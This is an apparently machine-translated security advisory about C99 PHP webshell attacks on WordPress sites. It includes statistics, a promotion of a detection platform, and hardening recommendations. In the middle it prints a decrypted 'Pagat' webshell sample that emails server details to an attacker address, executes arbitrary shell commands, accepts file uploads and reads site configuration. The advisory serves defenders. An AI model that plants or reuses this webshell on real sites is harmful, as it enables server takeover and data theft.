WordPress C99 php Webshell attack intensifies An Hengming apt early warning platform Webshell Audit alarms
Recently, IBM's Management Security Services (MSS) team issued a warning that it monitored the use of C99 PHP Webshell, a large number of WordPress sites suffered new attacks, reminding WordPress site administrators should promptly scan and repair site vulnerabilities.
According to the IBM MSS team's long-term monitoring and analysis of malicious events, security researchers found that in the past two months, there has been a class C99 Webshell caused by traffic anomalies, of which the number of events monitored in February was 404, and in March, 588 pieces, as follows
See more news
https://securityintelligence.com/got-wordpress-php-c99-webshell-attacks-increasing/
Anheng Institute collects C99 Webshell samples from Google search
After decryption to get
<? Php
error_reporting (0);
if (! isset ($_session [' Bajak '])) {
$visitcount = 0;
$web = $_server [' Http_host '];
$inj = $_server [' Request_uri '];
$body = "Ada Yang inject \ n {$web} {$inj}";
$safem 0de = @ ini_get (' Safe_mode ');
if (! $safem 0de) {
$security = ' Safe_mode = OFF ';
} else {
$security = ' Safe_mode = On ';
}
$serper = gethostbyname ($_server [' server_addr ']);
$injektor = gethostbyname ($_server [' remote_addr ']);
Mail (' cumicd@gmail.com ', ' {$body} ', ' Hasil Bajakan http://{$web} {$inj} \ n {$security} \ IP Server = {$serper } \ n IP injector= {$injektor} ");
$_session [' bajak '] = 0;
} else {
$_session [' Bajak '] + +;
}
if (Isset ($_get [' Clone '])) {
$source = $_server [' Script_filename '];
$desti = $_server [' Document_root ']. '/images/stories/food/footer.php ';
Rename ($source, $desti);
}
$safem 0de = @ ini_get (' Safe_mode ');
if (! $safem 0de) {
$security = ' Safe_mode:off ';
} else {
$security = ' Safe_mode:on ';
}
Echo 'Pagat–shell
’ ;
Echo '. $security. '
’ ;
$cur _user = ' ('. Get_current_user (). ‘)’ ;
Echo 'user:uid= '. Getmyuid (). $cur _user. ' Gid= '. Getmygid (). $cur _user. '
’ ;
Echo 'Uname: '. Php_uname (). '
’ ;
function pwd ()
{
$CWD = GETCWD ();
if ($u = Strrpos ($CWD, '/')) {
if ($u! = strlen ($CWD) –1) {
Return $CWD. ‘/’ ;
} else {
return $CWD;
}
} elseif ($u = Strrpos ($cwd, ' \ \ ')) {
if ($u! = strlen ($CWD) –1) {
Return $CWD. ‘ \\ ‘ ;
} else {
return $CWD;
}
}
}
Echo ';
Echo ';
if (Isset ($_post [' submit '])) {
$uploaddir = pwd ();
if (! ($name = $_post [' newname '])) {
$name = $_files [' userfile '] [' name '];
}
Move_uploaded_file ($_files [' userfile '] [' tmp_name '], $uploaddir. $name);
if (Move_uploaded_file ($_files [' userfile '] [' tmp_name '], $uploaddir. $name)) {
echo ' Upload gagal!!! ';
} else {
Echo ' Upload Success to '. $uploaddir. $name. ': \p ';
}
}
if (Isset ($_post [' command ')]) {
$cmd = $_post [' cmd '];
Echo '
'. Shell_exec ($cmd). '
’ ;
} elseif (Isset ($_get [' cmd ')]) {
$COMD = $_get [' cmd '];
Echo '
'. Shell_exec ($COMD). '
’ ;
} elseif (Isset ($_get [' RF '])) {
$RF = file_get_contents ('.. /.. /configuration.php ');
Echo $RF;
} else {
Echo '
'. Shell_exec (' Ls-la '). '
’ ;
}
?>
Further analysis of the victimization of WordPress discovery
Https://www.google.com.hk/?gws_rd=ssl#safe=strict&q=pagat+shell
Webshell can allow an attacker to run terminal commands on the server or upload new files to the site, and new files can be more intrusive webshells,ddos clients, Bitcoin miner software, or other malicious software
According to the IBM MSS team, as of April 12, 2016, only through the Google search engine simple query, found that there are about 32,000 WordPress site Pagat.txt files
The APT early warning platform detects Webshell attacks in real time and alarms C99 's Webshell and is not able to escape the rules of the APT early warning platform to be accurately alerted to help detect Webshell attacks in the first time.
Security recommendations:
Based on the current situation, it is recommended that the site administrator can do the following
1, edit the php.ini file, disable the Base64 decoding function. In the php.ini file, locate the relevant configuration statement "Disable_functions =" and set the statement to "disable_functions = Eval,base64_decode, gzinflate";
2. Change the name of the upload folder. WordPress allows the upload program to write files to the upload folder, if the user still use the default name, the attacker can easily speculate on the specific path of the upload file, so that the attacker to upload a php file containing shell scripts is greatly reduced;
3, the installation of a strong availability of security plug-ins, such as Wordfence WordPress plugin;
4. Conduct a security scan. We recommend the use of open source scanning tools, upload files for full-volume scanning, where you can use the Scanning Tool modsecurity, while the Awvs or WordPress security scanner to scan the site, timely detection of loopholes, and repair and reinforcement;
5, if found that the site has been infected, it is recommended to change the site in a timely manner all the management account password, and inform the site users for password changes.
Security researcher: Zise